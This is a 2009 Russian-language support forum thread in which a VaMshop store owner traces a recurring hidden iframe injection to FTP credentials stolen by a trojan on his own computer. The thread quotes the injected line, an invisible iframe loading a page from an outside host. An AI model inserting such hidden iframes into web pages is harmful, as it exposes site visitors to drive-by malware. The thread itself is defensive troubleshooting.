zaka4ek 0 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Добрый день! Вчера с утра обнаружил, что на сайте во все файлы под именем index и default прописали iframe. <iframe src="http://q3o.ru:8080/index.php" width=137 height=156 style="visibility: hidden"></iframe> Но это не беда, почистил все, заменил пароли на ftp. Сегодня захожу утром, а у меня на сайте рамблеровский счетчик, который я не размещал. Причем нормальный код должен быть таким: <a href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.jcn?1111111" alt="" width="1" height="1" border="0" /></a> А у меня вот такой: <script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?1111111"></script><noscript><img src="http://counter.rambler.ru/top100.cnt?1739758" alt="" width="1" height="1" border="0"> Судя по логам кроме меня по ftp никто не заходил. Поиск "top100Counter" по файлам ничего не нашел, кроме той строки, что я написал. В папке jscript нашел файлик jscript_JsHttpRequest.js в демо версии такого файла нет. Скажите он нужен? И вообще может есть дырки в скрипте, которые нужно закрывать? Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Нужен, если ajax корзину включите. Если нет, можете удалить. Лично мне дырок на данный момент не известно, да и iframe вирусы попадают не через дырки, а через Ваш компьютер, нужно комп от вирусов чистить, видимо. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 На всех компах Каспер лицензионный, грешу на тотал коммандер, но я все профили поудалял, посмотрим, что будет завтра. Ссылка на сообщение Поделиться на другие сайты
nikeya 0 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Добрый день! Вчера с утра обнаружил, что на сайте во все файлы под именем index и default прописали iframe. <iframe src="http://q3o.ru:8080/index.php" width=137 height=156 style="visibility: hidden"></iframe> У моего клиента тоже был этот вирус, он еще и в \templates\vamshop\module\main_content.html и в login.php тоже прописывается. Но это не беда, почистил все, заменил пароли на ftp. Сегодня захожу утром, а у меня на сайте рамблеровский счетчик, который я не размещал. Причем нормальный код должен быть таким: <a href="http://top100.rambler.ru/top100/"><img src="http://counter.rambler.ru/top100.jcn?1111111" alt="" width="1" height="1" border="0" /></a> А у меня вот такой: <script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?1111111"></script><noscript><img src="http://counter.rambler.ru/top100.cnt?1739758" alt="" width="1" height="1" border="0"> Судя по логам кроме меня по ftp никто не заходил. Поиск "top100Counter" по файлам ничего не нашел, кроме той строки, что я написал. В папке jscript нашел файлик jscript_JsHttpRequest.js в демо версии такого файла нет. Скажите он нужен? И вообще может есть дырки в скрипте, которые нужно закрывать? Вчера у рамблера были проблемы и с утра я тоже обнаружил непонятный счетчик рамблера, но сейчас все уже нормально. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 Как лечили? Ссылка на сообщение Поделиться на другие сайты
nikeya 0 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Клиент решил пере установить скрипт с нуля Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 Бляха муха...Опять... Опять iframe прописался!!! Что делать? Каспер не видит вирусов, фтп пароли все сменил. Видио через скрипт как то запускают... Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 А если есть доступ к логам?! Можно через логи посмотреть как появляется. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 есть, но я ничего подозрительно не вижу. Сейчас личку кину Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 Хотя судя по логам. Вроде как коннектится с разных IP к тем файлам, которые изменились Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Отправил access лог?! Какого числа появились iframe'ы и примерное время?! Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 Отправил на почту vam@kypi.ru. iframe появились с 17.50 я заметил что сайт не работает в 18.02. Судя по логам, как я понял, конектились с разных IP и меняли теже файлы, что и в первый раз. Коннектились судя по всему с моим логином =( Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 20 июля, 2009 Жалоба Share Опубликовано 20 июля, 2009 Спасибо, но смогу глянуть только завтра, сегодня уже не успеваю. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 20 июля, 2009 Автор Жалоба Share Опубликовано 20 июля, 2009 и Вам спасибо. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Вот в логе, что прислали, с 17 часов я так глянел на запросы, нет ничего подозрительно, т.е. никаких хитрых ссылок не открывалось. Обычно если дырка какая, то составляется какой-нибудь запрос-ссылка к магазину, через который всё вставляется, но ничего похожего в логе нет. Вы точно уверены, что касперский Ваш всё находит?! Попробуйте поменять доступ на ftp, а в ftp клиенте пару дней доступ не меняйте, может на компе всё-таки кака сидит?! Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 21 июля, 2009 Автор Жалоба Share Опубликовано 21 июля, 2009 В файле который Вы смотрели по подключениям по http нет ничего подозрительно. Но во втором файле по подключениям к ftp начиная с 17.47 начали подключаться с разных IP адресов и менять файлы. Мой IP начинается с 92. Я про это чуть выше писал. Сейчас сменили пароли на ftp еще раз, никуда их не прописывали даже в блокнот. Посмотрим, что даст, если все равно пропишут, значит с сервера тянут их. Каспером вчера сделал полную проверку, но ничего нет... Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Если подключение по ftp было, то 99%, что вирус. Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Кстати, как совет, полазьте по гуглу с вопросом, к примеру: iframe на сайте, как защититься Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 21 июля, 2009 Автор Жалоба Share Опубликовано 21 июля, 2009 Ок, щас буду мониторить Ссылка на сообщение Поделиться на другие сайты
Midas 0 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Это точно вирус (троян), он ворует сохраненные в Total Commander пароли и автоматически приписывает себя к файлам через FTP. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 21 июля, 2009 Автор Жалоба Share Опубликовано 21 июля, 2009 Я уже стер везде профили подключения к ftp в тотал коммандере. Тем не менее вчера опять код быд изменен. По логам кто-то заходил под мои логином и менял файлы. Точно, что пароли тырят, только как не пойму. На всех машинах стоит каспер лицензионный с последними обновлениями. Сегодня еще раз сменили пароли к ftp и никуда их не прописывали, если опять пропишут iframe значит прямо с сервера тянут... Ссылка на сообщение Поделиться на другие сайты
support 447 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Согласен, что вирус, тем более, что ftp лог это подтверждает. Нужно наверное вместо касперского специальную утилитку поставить для подобных вирусов, вроде есть такая, нужно черех гугл поискать. P.S. Сам я просто под линукс сижу и конкретную ссылку не подкину, к сожалению. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 21 июля, 2009 Автор Жалоба Share Опубликовано 21 июля, 2009 Сейчас в голову пришло. Если это вирус, почему тогда остальные сайты не тронуты? Они тоже на этом сервере висят. Код прописался на 2 сайтах. Оба на Vamshop один на домене второго уровня, второй на поддомене второго домена. Странно все как-то... Причем сайт на втором домене не тронут... Ссылка на сообщение Поделиться на другие сайты
Midas 0 Опубликовано 21 июля, 2009 Жалоба Share Опубликовано 21 июля, 2009 Ну мало ли по какому он алгоритму дерево обходит... А посмотрите в FTP-логе: какой промежуток времени между скачиванием файла с сервера и его последующей загрузкой? Если 1-2 секунды, то стопудово троян. У моего товарища такое было как-то. Ссылка на сообщение Поделиться на другие сайты
zaka4ek 0 Опубликовано 21 июля, 2009 Автор Жалоба Share Опубликовано 21 июля, 2009 Ну примерно такое время. Сейчас с drWeb скачал их утилитку бесплатную CureIT нашла trojan.downloader. Распростаняется через почту, так что VaM, Вам стоит тоже провериться =( Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения